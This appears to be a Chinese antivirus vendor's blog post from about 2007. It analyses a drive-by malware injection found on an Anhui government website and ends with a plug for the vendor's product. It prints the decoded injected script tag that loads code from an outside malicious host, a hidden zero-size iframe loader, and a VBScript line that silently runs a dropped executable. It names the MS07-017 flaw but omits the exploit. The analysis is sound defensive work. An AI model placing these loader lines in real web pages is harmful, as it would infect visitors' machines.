在探索Google搜索结果过滤网页恶意病毒过程中,发现安徽某政府网亦被恶意入侵者攻陷并插入恶意病毒下载指令。
=700)window.open('/news/UploadFiles_9994/200705/20070521173650942.jpg');"src="http://3800hk.com/news/UploadFiles_9994/200705/20070521173650942.jpg"onload="if(this.width>700)this.width=700;if(this.height>700)this.height=700;"border=0>
点击访问“数字安徽”主页(hxxp://www.digitalanhui.gov.cn/)后,终截者随即弹出拦截到的网站恶意木马,如下图所示:
=700)window.open('/news/UploadFiles_9994/200705/20070521173650814.jpg');"src="http://3800hk.com/news/UploadFiles_9994/200705/20070521173650814.jpg"onload="if(this.width>700)this.width=700;if(this.height>700)this.height=700;"border=0>
终截者抗病毒软件安全狗成功拦截到恶意挂马病毒
查看主页源文件代码,仔细检查后发现可疑挂马指令:
=700)window.open('/news/UploadFiles_9994/200705/20070521173650157.jpg');"src="http://3800hk.com/news/UploadFiles_9994/200705/20070521173650157.jpg"onload="if(this.width>700)this.width=700;if(this.height>700)this.height=700;"border=0>
这段挂马指令经过了unescape码加密,因此我们还需要还原他本来面目,解密过程通过Unicode码的转换实现即可。
还原如下:
Ø %3Cscript%20src%3D%22http%3A//w1e.cn/js/1.js%22%3E%3C/script%3E
ü <scriptsrc="http://w1e.cn/js/1.js"></script>
下载hxxp://w1e.cn/js/1.js查看其源文件,发现该脚本调用了另一个Htm文件,其内容如下:document.write("<iframewidth='0'height='0'src='http://w1e.cn/js/1.htm'></iframe>");
直接打开这个网页,会被表面现象所蒙蔽,因此这并不是本来面目,如下图所示
这里的源代码解密较周折,我们直接来看结果:
客户端如果没有做好防护或安装终截者抗病毒软件的话,就有可能直接中招,触发后,会直接从下载病毒体到C:\NTDETECT.EXE并由1.vbs解释执行(wscript.createobject("wscript.shell").run"C:\NTDETECT.EXE",0)
1.说明:
MicrosoftXML核心XMLHTTP控件代码执行(MS07-017)
受影响系统:
MicrosoftXMLCoreServices4.0
-MicrosoftWindowsXPSP2
-MicrosoftWindowsServer2003SP1
-MicrosoftWindowsServer2003
-MicrosoftWindows2000SP4
描述:
MicrosoftXML核心(MSXML)允许使用JScript、VBScript和MicrosoftVisualStudio6.0的用户构建可与其他符合XML1.0标准的应用程序相互操作的XML应用。
在MicrosoftXMLCoreServices4.0的XMLHTTP4.0ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。
2.利用
这个主要是利用两个对象Microsoft.XMLHTTP和Adodb.Stream。
具体过程不做还原演示,此处略。
3.预防
修复补丁或安装具有抗攻击的终截者抗病毒软件(hxxp://www.s-sos.net)。
当前位置:
